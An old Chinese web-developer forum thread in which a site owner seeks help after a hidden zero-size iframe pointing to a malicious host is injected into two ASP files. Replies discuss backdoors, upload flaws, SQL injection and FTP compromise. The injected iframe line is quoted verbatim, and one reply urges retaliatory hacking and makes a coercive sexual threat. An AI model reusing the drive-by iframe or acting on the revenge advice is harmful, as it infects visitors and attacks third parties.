[急急]网站被挂马了，求救！

我做的一个网站，在前台开了上传的通道。  
  这两天发先网站被人家挂上“木马”啦。  
  在   top.asp   和   btm.asp   两个文件里面都出现了  
   
  <iframe   src="http://www.ac66.cn/88/index.htm"   width="0"   height="0"   rameborder="0"></iframe>      
   
  这样的代码，哪位高人知道这是什么木马做的？？  
  如何才能彻底的除掉这个木马呢   ？？  
  补充：我在上传文件的目录里面没有发现可以的执行文件（.asp一类的文件。）  
              每次   top.asp   和   btm.asp被修改之后，能看到修改的时间。  
   
  求解啊。解完马上结帖。 问题点数：50、回复次数：47Top

1 楼littlelam（竹子岌)(http://www.toaspx.com）回复于 2006-08-04 16:41:56 得分 5

我在上传文件的目录里面没有发现可以的执行文件（.asp一类的文件。）  
  =======================================  
  木马可能先上传到这个目录,然后在其它目录写一个,再删除这个目录下的文件是可能的,前提是其它目录可写Top

2 楼zhangjincheng88（雪鹰）回复于 2006-08-04 16:49:02 得分 0

昨天我把网站上面的所有文件都下载到我电脑里了，用瑞星杀毒，没有发现病毒。  
  在搜索源代码，也没有发现包含“ac66”的地方,在包含“<iframe”的地方也没有发现可以的地方。  
  现在是没有发现任何的   残留   文件。。晕着呢。Top

3 楼littlelam（竹子岌)(http://www.toaspx.com）回复于 2006-08-04 16:52:18 得分 0

也可能是服务器中毒了Top

4 楼zhangjincheng88（雪鹰）回复于 2006-08-04 16:58:20 得分 0

服务起是     商务中国   的，可能性还是存在的。  
  问题是我的包含文件不指一个。只有"top.asp"和"btm.asp"被篡改了，  
  而"H_top.asp""conn.asp"等文件都没有改变。不解。Top

5 楼huihui0103（）回复于 2006-08-04 17:46:42 得分 0

网站有漏洞吧Top

6 楼cxmdtl（泡泡狼）回复于 2006-08-04 17:49:50 得分 5

应该是你的网站的原因吧，之前我一个网站有问题，服务器上的所有网站的首页都被挂了马Top

7 楼zhangjincheng88（雪鹰）回复于 2006-08-04 17:55:47 得分 0

原因在哪里，有谁知道么？Top

8 楼zhangjincheng88（雪鹰）回复于 2006-08-04 18:01:19 得分 0

这个木马通常在哪里入侵？！Top

9 楼subway5（）回复于 2006-08-04 18:22:36 得分 0

挂马者应该是“用冰狐浪子超级网页木马生成器”  
  生成木马放在自己的随意申请的网站上，在将代码加到你的网页  
  点击网页，就会在本机生成木马  
  可能你的网站有漏洞被人提权，管理员密码被破解，暴库，或服务器被入侵了  
  Top

10 楼xiaoyaowp（huanong）回复于 2006-08-04 20:00:38 得分 5

挂马者应该是“用冰狐浪子超级网页木马生成器”  
  生成木马放在自己的随意申请的网站上，在将代码加到你的网页  
  点击网页，就会在本机生成木马  
  可能你的网站有漏洞被人提权，管理员密码被破解，暴库，或服务器被入侵了  
   
  有可能Top

11 楼subway5（）回复于 2006-08-04 20:57:59 得分 0

xiaoyaowp(乐乐鸟)你是跟屁虫啊？为什么搬别人的东西，无耻！Top

12 楼smartcatiboy（）回复于 2006-08-04 21:37:18 得分 0

菜，严重关注中，大家继续发言Top

13 楼wusongping（感谢曾经帮助过我的朋友）回复于 2006-08-04 23:19:45 得分 5

仔细看下代码吧  
   
  不一定非要单独弄个webshell在你程序里面嘛，人家也可以在你程序中加后门啊  
   
  常见的有   冰狐微型后门、海洋一句话、蓝屏一句话   等等  
   
  这些后门都只有一句话，随便插到你的那个代码里面   就可以达到这个效果了  
   
  所以建议还是把程序仔细看看。  
   
  Top

14 楼zhangjincheng88（雪鹰）回复于 2006-08-05 09:43:02 得分 0

程序文件有18*30多个呢，要一个个看效率低死了。  
  谁能提供一些搜索文件的关键字呢？感谢+分。。  
     
  问题补充：  
  网站前些天被挂上木马之后，我及时删除了<iframe></iframe>  
  过了5天，又出现了。估计是对手手工操作的。。Top

15 楼neils1212（）回复于 2006-08-05 14:07:32 得分 0

关注中。。。。Top

16 楼wengnet（西门吹雪）回复于 2006-08-05 14:31:10 得分 0

是不是有内鬼Top

17 楼Rockjok（小明）回复于 2006-08-05 15:22:00 得分 0

upTop

18 楼cr4zy（）回复于 2006-08-05 16:16:01 得分 5

小黑使用了一句框架来挂马。  
  http://www.ac66.cn/88/index.htm     其真正木马页面地址。  
  检查你的网站，估计存有小黑的后门。  
  检查你的网站漏洞，比如注入点，上传，默认管理员帐号密码是否更改，数据库是否被动过。  
  还可以将top.asp和btm.asp的属性改为   只读。Top

19 楼jim97（木子）回复于 2006-08-05 16:24:59 得分 0

关注！接分Top

20 楼hurrayboy（）回复于 2006-08-05 17:40:50 得分 0

顶一下啦!  
   
  我也被挂马了!Top

21 楼CacheStar（Microsoft）回复于 2006-08-05 20:56:06 得分 0

xTop

22 楼lvwei（我在社区的昵称）回复于 2006-08-05 21:00:56 得分 5

晕  
  查查你的程序的漏洞吧  
  看看你用了那些论坛，多打补丁  
  网站程序网上载的话自己做点修改，改下数据库路径  
  在程序里把防注入模块添上  
  涉及到数据提交的地方都给检查下提交的数据是否有恶意代码，防止跨站挂马  
  是自己的服务器的话看看他有没有在你的系统上留后门了  
  发现ASP木马的时候不要删  
  木马内容换了  
  挂个马  
  让他也中  
  然后报复他  
  或是记录他的信息  
  然后送给警察叔叔  
  或是威胁他让他姐姐陪你睡觉  
  要不就告他Top

23 楼wusongping（感谢曾经帮助过我的朋友）回复于 2006-08-05 21:01:42 得分 0

搜索下关键字  
   
  exec     evel    
   
  网上有个检查这些关键字的   asp文件的，一下忘记叫什么了  
  呵呵  
   
  你搜索下Top

24 楼bawn（猪是的念来过倒）回复于 2006-08-05 22:32:06 得分 0

我的也是，是我自己写的程序，用了网上的上传组件，但应该没有什么问题的，  
  实在郁闷啊。  
  Top

25 楼id_（ID）回复于 2006-08-05 23:03:13 得分 0

不给马喝水----->渴死  
  不给马喂饲料--->饿死Top

26 楼pitchstar（一站）回复于 2006-08-06 00:29:38 得分 0

你上传目录是不是允许执行asp   啊？Top

27 楼robake（Roback）回复于 2006-08-06 08:53:54 得分 0

目录不允许执行asp的空间要着干嘛，肯定要求执行的。Top

28 楼BB203203（为了过日子）回复于 2006-08-06 08:59:58 得分 0

mark~~Top

29 楼sdxlh007（海）回复于 2006-08-06 11:45:33 得分 0

<iframe   src="http://www.ac66.cn/88/index.htm"   width="0"   height="0"   rameborder="0"></iframe>      
    木马地址在这呢  
  http://www.ac66.cn/88/index.htm  
  把这段删除了就好了，主要是管理好你自己的ftp帐号和密码  
  给别人权限时   要小心，一般就没事Top

30 楼zhangjincheng88（雪鹰）回复于 2006-08-06 12:04:30 得分 0

感谢各位的关注。  
   
  还有个疑问，我现在使用的空间帐号不只是我一个人使用，另一个人在使用这个帐号连接FTP的时候。网站上马上就发现   木马代码了，当然了。这不是每次都出现的，但是前两次出现   木马的时候，那个人的确使用过FTP了。。。  
   
  先在又不确定是不是他带的木马到空间上的呢   ？？  
   
      不解啊。继续求解。Top

31 楼will123（）回复于 2006-08-06 12:11:31 得分 0

关注中Top

32 楼imqq（我为奇狂）回复于 2006-08-06 14:48:18 得分 0

DINGTop

33 楼gl317（）回复于 2006-08-06 16:22:23 得分 5

我估计是你租用服务器的FTP被别人破解了。  
  破解人很可能是和你租用一台服务器的人。  
  他利用了服务器漏洞上传了木马，再获得了FTP管理员权限就可以对服务器里的所有站点进行更改Top

34 楼zhaoempire（）回复于 2006-08-06 16:56:07 得分 0

哎，等待查下日志挖Top

35 楼lvwei（我在社区的昵称）回复于 2006-08-06 18:16:12 得分 5

晕  
  一帮人怎么就知道是服务器或FTP出问题了呢  
  我敢说很大原因是楼主的网站程序有问题  
  现在的程序员编程根本就不知道多想点别的相关的东西  
  根本就不知道动脑子想想  
  Top

36 楼y7967（三千）回复于 2006-08-06 19:56:10 得分 0

要是网管干的呢？呵呵Top

37 楼wkefeng（少数派报告）回复于 2006-08-06 23:05:44 得分 0

makeTop

38 楼zhangjincheng88（雪鹰）回复于 2006-08-07 09:09:54 得分 0

感谢     sdxlh007(海)   的回答。。  
   
  说   FTP   有问题，不是因为别的原因，  
  而是那个使用FTP的人的电脑本身就有病毒，我在想是不是他的电脑感染了源程序文件，然后在覆盖了   FTP   上的文件呢   。。。。。。。。Top

39 楼poppunk（海树）回复于 2006-08-07 11:31:11 得分 0

肯定是网站程序问题！我的站用的有别人提供的免费代码，服务器自己管，但是还是被<ifram>了。Top

40 楼hanhongmin（BoY'LovE）回复于 2006-08-08 18:25:45 得分 0

关注ING  
  MARKTop

41 楼dingmin（专顶师太的小PP）回复于 2006-08-09 11:28:49 得分 5

仔细检查下所有的文件,看最后的修改日期,就很容易知道是哪里出问题了~  
  注意SQL注入       唉Top

42 楼csover8（(努力找工作中...)）回复于 2006-08-09 12:09:19 得分 0

markTop

43 楼lizh0103（天天向上）回复于 2006-08-09 20:08:40 得分 0

markTop

44 楼lvwei（我在社区的昵称）回复于 2006-08-09 21:17:42 得分 5

文件修改日期也可以改的  
  一定要细心点Top

45 楼leo_jun（）回复于 2006-08-09 21:24:07 得分 0

菜鸟~~~  
  关注中......Top

46 楼zhangjincheng88（雪鹰）回复于 2006-08-11 12:10:20 得分 0

SQL注入   的问题我都查过了，没有    
   
   
  继续关注中………………Top

47 楼xiaofanku（发扬中国博大的无术精神）回复于 2006-08-11 12:43:07 得分 0

多年前我也经历过！现在没有再发生！空间安全问题可以找ISP，代码质量问题就要问你了Top

相关问题

• 帖主：zhangjincheng88
• littlelam
• cxmdtl
• xiaoyaowp
• wusongping
• cr4zy
• lvwei
• gl317
• lvwei
• dingmin
• lvwei

• Web开发类图书